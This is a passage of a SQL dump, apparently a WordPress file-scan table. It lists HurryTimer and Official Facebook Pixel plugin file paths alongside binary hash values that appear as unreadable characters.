','wp-content/plugins/hurrytimer/admin/templates/woocommerce-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h$Tao','=[@E^$Ams','',0,'?'),(',#*oO\0+','wp-content/plugins/hurrytimer/assets/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Ly1k','M/\0`x2W)\nOdU','',0,'?'),('5?:Å^=@','wp-content/plugins/hurrytimer/assets/css/base.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C,Gχ@x%','wq2δ@χ[=+H','',0,'?'),('/; l=8IB','wp-content/plugins/hurrytimer/assets/css/codemirror.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(R~P','L<i/8jZc)z{{%X','',0,'?'),('T\rFk/źiB','wp-content/plugins/hurrytimer/assets/css/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rĞaX<e3B-','؟栐6B&\'NO`aVPf\0\0f','',0,'?'),(',x\'sq<P	2','wp-content/plugins/hurrytimer/assets/images/action.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mj\0ʿ(','N5#>ܷ4{}+{˽r)bBY','',0,'?'),('A{bA784\"=','wp-content/plugins/hurrytimer/assets/images/fullscreen-exit.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wAM\Z\02Nܸ','ƹM S+^\rMF]','',0,'?'),('HIT5͝sn]','wp-content/plugins/hurrytimer/assets/images/fullscreen.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C,D6ٸ','rcHP)F$nmCaKi\rzGb','',0,'?'),('_Y5g3Sb','wp-content/plugins/hurrytimer/assets/images/help-circle.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yt憬4v&#w','+q\"8=rx%XT\Z$2V','',0,'?'),('ql@vGe<r','wp-content/plugins/hurrytimer/assets/images/medal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xq/p]b_','YNͤhhߋ5M־','',0,'?'),('Q3빶1WA0l','wp-content/plugins/hurrytimer/assets/images/store.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\\B%ݐ\n','LXW.I\'umwyr#GݾŒX','',0,'?'),('ǼU~c\"Q','wp-content/plugins/hurrytimer/assets/images/timer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Ԋv\\%&w;','gHn5&@cr1m','',0,'?'),('c[~-:','wp-content/plugins/hurrytimer/assets/images/transparent.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\r,hT','U_of1,jkKv낛c\";N','',0,'?'),('`֮Zڸz_','wp-content/plugins/hurrytimer/assets/images/trophy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^ʄ3*Bv','[#P\Z=ѼfM<TԝPm$se','',0,'?'),('+|u(҉jC','wp-content/plugins/hurrytimer/assets/images/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p-`OI6','fyyHTǢj\rs85@','',0,'?'),('޿/\'#ŶE,;?','wp-content/plugins/hurrytimer/assets/images/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0jǐo','3atN[q\n}:-~!\\ݟ8','',0,'?'),('\"2^lyQc޽','wp-content/plugins/hurrytimer/assets/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N~>/99<Ч','lGF=0}	\'T(\r','',0,'?'),('@@;ԓ~)&','wp-content/plugins/hurrytimer/assets/images/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@%yOywP	','\"9@1ܺ\\LM7Y!Zo.','',0,'?'),('_#$1!\\\r','wp-content/plugins/hurrytimer/assets/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	:8\'kDfҤ[','\';ĝuWZiTTH}','',0,'?'),('ߚ\\b`s','wp-content/plugins/hurrytimer/assets/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N+_\0&1h6','^DP+\nn YGϜ?AM>,b','',0,'?'),('i`@m','wp-content/plugins/hurrytimer/assets/images/upgrade_06a0.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<abΛ]>','O#4*fX?E@9Ú̈́՗7','',0,'?'),('FJ ','wp-content/plugins/hurrytimer/assets/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{J!u?}s','Aũ`97}b>MHJHh|Fj','',0,'?'),('!ur6[','wp-content/plugins/hurrytimer/assets/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sLW0fWA>P','-~c\r!5VD6SNӉx\ZI','',0,'?'),('TNaU \0I','wp-content/plugins/hurrytimer/assets/js/admin.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%2Ud','Q-m+d*[})D#w:kCf','',0,'?'),('.N4y\"','wp-content/plugins/hurrytimer/assets/js/codemirror-css.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w_;]<D','9\'n+o2]ȡI43=','',0,'?'),('zt\"=NBP','wp-content/plugins/hurrytimer/assets/js/codemirror.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^:z','#*H|A}HkAO%Qy%','',0,'?'),('x:6ꩶ&\rЦ','wp-content/plugins/hurrytimer/assets/js/cookie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\0(h\0B*','eMΰsk9wڡ*+A','',0,'?'),('ۏ]0{c','wp-content/plugins/hurrytimer/assets/js/hurrytimer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\0IU/|ce','6d|-YX4ry-iM','',0,'?'),('+:!ъRi','wp-content/plugins/hurrytimer/assets/js/jquery.countdown.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']?gcN','+}47{yn+|D','',0,'?'),('deܱ','wp-content/plugins/hurrytimer/assets/js/jquery.modal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V*51A>','8˲T䙴!﷡aRQ;>)$,b','',0,'?'),('O(7<oӳPN','wp-content/plugins/hurrytimer/assets/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Kr`ꌑ#','Ұxt;4&6D\"T','',0,'?'),('4,(P4','wp-content/plugins/hurrytimer/assets/js/timepicker-addon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?_kfpvs4','ۆ%%l:Jf<bqPPt˯}ߝ\"f','',0,'?'),(':?W©','wp-content/plugins/hurrytimer/hurrytimer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z}$\"4','	N\nh52Z.F{H\Z!0,\"`','',0,'?'),('2;Y?.ڂ\\a','wp-content/plugins/hurrytimer/includes/ActionManager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{X;b','\r{B]IDc37l_2ӘKGꤘK','',0,'?'),('uLՀs%:Gr','wp-content/plugins/hurrytimer/includes/Activator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u/ D+N\\`~','^5bj.V?R~H/','',0,'?'),('K4fjrT>','wp-content/plugins/hurrytimer/includes/Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aG~k,!k-#2','o9$%AdO','',0,'?'),('+ToQ=*','wp-content/plugins/hurrytimer/includes/Bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ac]4st^','n\naْpI~XetugA','',0,'?'),('g:y{\r3','wp-content/plugins/hurrytimer/includes/C.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':7`KM[A1\"^',']Juǲ{8>zzw','',0,'?'),('Bӕ/ >_+>','wp-content/plugins/hurrytimer/includes/Campaign.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\Z4.bE%38','x+\\+45\"st&','',0,'?'),('&}}lxo`uv','wp-content/plugins/hurrytimer/includes/CampaignBuilder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I,vV=)~ґ5','+ޣaXaqZ-+ײBA%7w','',0,'?'),('E^{k}\\k','wp-content/plugins/hurrytimer/includes/CampaignBuilderLegacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v9Zjä','%ux[&`\'eL','',0,'?'),('\\.[[!','wp-content/plugins/hurrytimer/includes/CampaignShortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z3Ņv!NC','C*)HbU!ް#J&8','',0,'?'),('3סPr&Z','wp-content/plugins/hurrytimer/includes/ConditionalLogic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y:Vr\'v','ا[0o%\\:ra6+ś.mG','',0,'?'),('C+R\n','wp-content/plugins/hurrytimer/includes/CookieDetection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n{(\0ɪl+','6f:rk8!/y\0;HbL','',0,'?'),('LsE@','wp-content/plugins/hurrytimer/includes/Deactivator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VCgky','P;^x{ǽ9Bat*}ie4PJ','',0,'?'),('ؚ_V\nwy','wp-content/plugins/hurrytimer/includes/EvergreenCampaign.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p3/ϡ=);','D3΀	f2TFs+#@%m','',0,'?'),('N]L4_[','wp-content/plugins/hurrytimer/includes/Frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9u@-M\n','gȉe!D1AJu9gl8+','',0,'?'),('5AZ`/2','wp-content/plugins/hurrytimer/includes/I18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>OM','WQbٮ]2rݲDTwP_^','',0,'?'),('֜','wp-content/plugins/hurrytimer/includes/IPDetection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Y|:','1qZн/S\ZTI.fy','',0,'?'),('M.pg3i8]U','wp-content/plugins/hurrytimer/includes/PluginSettings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u`]_*#','tE$am/G[/r#\"G!la,','',0,'?'),('㫝8\0эk?','wp-content/plugins/hurrytimer/includes/RecurringCampaign.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǛPfw\r]uLy','^`$wҾ=8QǯiJ','',0,'?'),('Iat@','wp-content/plugins/hurrytimer/includes/Uninstaller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ʝd)>BUpJ','5kќ-S;5mƭ\"3Ь','',0,'?'),(';R!}_[X	ٽ','wp-content/plugins/hurrytimer/includes/Upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fܷ1E{J','^Sn\ZvstS<N:0=N','',0,'?'),('t\"IpSpn*','wp-content/plugins/hurrytimer/includes/Utils/Form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$T+*a\0o8O߿','O~lb`ڐSg\r0ѭPt','',0,'?'),('Yo2','wp-content/plugins/hurrytimer/includes/Utils/Helpers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8hS0O˷_k',',yKs=E0{+>WK^Mm','',0,'?'),('n	=y','wp-content/plugins/hurrytimer/includes/WCCampaign.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڻf7lγ','*PX󑕕;`O\r<RdR','',0,'?'),('Yƫ\Zao)','wp-content/plugins/hurrytimer/includes/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}	\"q:*Q','TԼqo5r}vZ셑','',0,'?'),('1B','wp-content/plugins/hurrytimer/includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^P4n+F\"z','=ʁ`њM\0/\\,I0юiEɣvKf','',0,'?'),('T\\kEk+ʶ','wp-content/plugins/hurrytimer/includes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{J!u?}s','Aũ`97}b>MHJHh|Fj','',0,'?'),('Nn-ނj٨*','wp-content/plugins/hurrytimer/includes/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1|m/MҼ','CoVZ2p,1ft0AХ','',0,'?'),('ݨd}$','wp-content/plugins/hurrytimer/includes/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%*T*`','289vu3n	C2sva/','',0,'?'),('ckYԧc','wp-content/plugins/hurrytimer/includes/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']_#D\0','\Z ے%4~N~Gh!b:wɌ\'','',0,'?'),('8b\nX*','wp-content/plugins/hurrytimer/includes/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('N*d^aǂ','wp-content/plugins/hurrytimer/includes/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('\rQWO+>','wp-content/plugins/hurrytimer/includes/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z[)9dS','&6 LfY3SBUnץ','',0,'?'),('s6G%M,','wp-content/plugins/hurrytimer/includes/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mX|w','=7Q=qW_]u8s','',0,'?'),('sYh-V1Y\"VlQ','wp-content/plugins/hurrytimer/includes/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c1UPM-`U','zldT.Bi&_Q|#(','',0,'?'),('SXJEP','wp-content/plugins/hurrytimer/includes/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7	UwW','1 WTH%ޝr1ѶCA','',0,'?'),('}neT@pt','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Йp()ooEކB','@DjD=J_Mg9;Q^>','',0,'?'),('+9$\"A$Ը','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j{ wSQf','l]ŗױ\\Ļ(OMOBq9','',0,'?'),('\rY}o','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Db@\\[.B$','*Wac<$DzI	(','',0,'?'),('9󤳣M?d','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^2R\0|3R!}','	ItιPnK.v0dN&L','',0,'?'),('h7bmG','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/phpunit.xml.dist',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U&A	5B,ӥ','5@l\rk@VM94hL~','',0,'?'),('tw2x1D6','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/RRule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mo|̳z\'r\Z','%%BGȣFU?','',0,'?'),('\0\'!e%SR','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/RRuleInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gGۢŪ.S','M~-SXS<W51~Nj+`7','',0,'?'),('G&Z:r','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/RSet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_..d?3','څM&1W֣,HBN+i','',0,'?'),('{7fPrg6V','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/RfcParser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','戬n7\'@d','+L~N\rcϘmƔ]\"<Xg','',0,'?'),('PjnV)','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/de.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ïNk=i@Gu','\Z~n˛+q8au4%K','',0,'?'),('|Ƈ','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/en.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A3a`l','ߛŲ@~ES%J\n穅-ktٹ','',0,'?'),('rđz\"<́','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/es.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IZoRJ2a˿','EjY#q+l)(viOqWZBr','',0,'?'),('|\r.ns\rV','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/fi.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\0\r⽠5}_YR	','6X̖uY?22*r`z{','',0,'?'),('KK;]WH_','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/fr.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X.\\M<-','įs{\'$yť;hn','',0,'?'),('0D#','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/it.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_K̫U5*]','ꨝ`尡R\rT^!8ADS','',0,'?'),('\0>fEK	','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/src/i18n/nl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂdY\'c','f.ɟJ9~\'/L\r]뷤D5[','',0,'?'),('^̗61AG\\$C','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/tests/RRuleTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CcBOT[yX;','룃FLgA__}O@3','',0,'?'),('X}Ԡ]','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/tests/RSetTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X*8G,(.z','l5\ZON\rIqFc]@1o','',0,'?'),('V>݅uI','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/tests/RfcParserTest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*4e:K0a','ڔ+cnPSD*Ԅr0]','',0,'?'),('Bnܲ','wp-content/plugins/hurrytimer/includes/vendor/rlanvin/php-rrule/tests/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','嚇#g8*','93\ne|j!,l\rL2Q1','',0,'?'),('$oD;','wp-content/plugins/hurrytimer/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{J!u?}s','Aũ`97}b>MHJHh|Fj','',0,'?'),('\"UvŸk3g','wp-content/plugins/hurrytimer/languages/hurrytimer.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\noESߝ\\]','ryKņ璃j\'UlHbY&#4','',0,'?'),('=êrؠwq','wp-content/plugins/hurrytimer/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t償~D g8Y','ȣFV3Nq:gE }@S','',0,'?'),('o/:v\'.9\'A','wp-content/plugins/official-facebook-pixel/CODE_OF_CONDUCT.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OoFO','`!*LG	\'O&N2cZ-\nm','',0,'?'),(']<5Ɇՠ7','wp-content/plugins/official-facebook-pixel/CONTRIBUTING.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.Ƿhjru','n*&\"<UZ[WTljmʄ_r','',0,'?'),('`O׀+˰<~','wp-content/plugins/official-facebook-pixel/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9o*n+/','\0v1sN>cID٦I0-','',0,'?'),('\nC\\t|s','wp-content/plugins/official-facebook-pixel/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pV\"34\'d:ϝ','慵o?6QGy9;܋cQy','',0,'?'),('H>ʮh&w','wp-content/plugins/official-facebook-pixel/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m%;14*m%,','0T-A|og6Tvvg}u\\<k]','',0,'?'),('#]}fE>','wp-content/plugins/official-facebook-pixel/composer.lock',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zk(=E,d','f$\0},vc70bK:{{','',0,'?'),('[&Eٓ','wp-content/plugins/official-facebook-pixel/core/FacebookPixel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#;c&#c0@\n','~28kn#k)(','',0,'?'),('\0#kvz	,','wp-content/plugins/official-facebook-pixel/core/FacebookPluginConfig.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2mWKOO\r1','&lx/?(jFwxgEy','',0,'?'),('#mD`(|','wp-content/plugins/official-facebook-pixel/core/FacebookPluginUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HKo3֞$ww','^ٱHIv$S^X_bdQ','',0,'?'),('F8jRunf\r','wp-content/plugins/official-facebook-pixel/core/FacebookWordpressOptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p2>#Y_\\','0N`D{b̭>0l}i۴','',0,'?'),('qȥeI','wp-content/plugins/official-facebook-pixel/core/FacebookWordpressPixelInjection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h+w]~ (3qX','Zbٍ{Ϯ,.x@@=l\\}D','',0,'?'),('\09nF1Ec0','wp-content/plugins/official-facebook-pixel/core/FacebookWordpressSettingsPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@R0QFM','aD@}RF82U|qX_:dem)','',0,'?'),('qhrȆfF','wp-content/plugins/official-facebook-pixel/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}L2܇jYqUa','B7Q鐯:~e/FgG$Rf','',0,'?'),('\'UlkA','wp-content/plugins/official-facebook-pixel/facebook-for-wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8m[ƿeP','\">dy	/h.Gn','',0,'?'),('@x\rYt]<FWI`d','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressCalderaForm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\Zqbkx','W9p*m߭b/G\0,(\\Sk/','',0,'?'),(',=\rs;i','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressContactForm7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',&(ZQb','~KrWNl*Nf/i)&xXY','',0,'?'),('\ns4t','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressEasyDigitalDownloads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IKsm<NV','SMJBq3šk','',0,'?'),(';ӵ^~c\nx','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressFormidableForm.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|lLnO','xԾ\Z5]t%%1','',0,'?'),('b#u[TAAU','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressGravityForms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Iij',']@W;LٟiDf	~	Mq2','',0,'?'),('\0ho4\rNpi','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressIntegrationBase.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\\\\ZX','h*w)eʽ ݥk\nNo-','',0,'?'),('	\\\"%h','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressMailchimpForWp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TLx=u{|h','\rHEv3ԯa\rß@}~','',0,'?'),('})X^u-f','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressNinjaForms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','th`Ɂ\0S','38$y7#Exݼ:(]q6aR','',0,'?'),(' E<eg ^T#u','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressWPECommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NCy-R5}=9-T','bR\"Ϝy	ߙ:@#蚽i','',0,'?'),('å<F','wp-content/plugins/official-facebook-pixel/integration/FacebookWordpressWPForms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F5ƢԴ4ltΕo','Rɣxua\Zʈ[D\\K','',0,'?'),('&Z0\Z2*?kx','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-ar_AR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y1dSK$g$F','ii)keMmi*%o','',0,'?'),('ުD]','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-ar_AR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lp\r)b7e',';%r5xjh\'j&؍I|+z\0','',0,'?'),('oB2spaݭ','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q$GP~x','PəzO8Q5s(?','',0,'?'),('5xPz]ZQ9','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X0\n3L','T--W<ܕ5-2Pε[k\nb:','',0,'?'),('[\ZkýD','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-da_DK.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?w26ăFq','O\n<p^~8Aې[','',0,'?'),('Bl4d\0J(','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-da_DK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ύ?«j9Y','\';բwk*;\r:O\\ 2gW#','',0,'?'),('k\'VpQTw','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1)$V','uD`;;gQŠjcx\'VOixW','',0,'?'),('Bc뜭yWVp','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f9:dUA\rrf','ITf~/uQ\0fd]NîL','',0,'?'),('[Fu?QZf','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-en_GB.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"uH\"X].','e85dBZN&.b\0q\Z','',0,'?'),('`ҩrw	','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-en_GB.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hxsݣ43f','V\"?Qyc(Ƹ)S','',0,'?'),('0[$!5[K<','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N>>朙','i!ʰEL>Y.\0Lâ\0V|','',0,'?'),('$LJsiC','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|7\n\n\"To@f','FBݴtk?RZCyp\rAfp-jm','',0,'?'),('L`R','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-es_LA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3yIʅ','dZ.H*Z ~Jx%Y(вc','',0,'?'),('/slrVe','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-es_LA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ny%cļ<w^','׽F	L$Qd;3VhqAi0\0','',0,'?'),('[Z	&[\0oe+c','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-fi_FI.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MJ^mr\nضZ[','\reVXIU\"kUD:~OxsR','',0,'?'),('3sK㖗r','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-fi_FI.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|CާfG<','\0wzU7lX*ѿYX\r=*ZIB','',0,'?'),('\nNǱM}|iu','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>km-C	','t=#G3Vtӷ','',0,'?'),(';y.q~gQ#','wp-content/plugins/official-facebook-pixel/languages/official-facebook-pixel-fr_CA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J`rHlWO','\ZPrz%#K~\0gEb&DA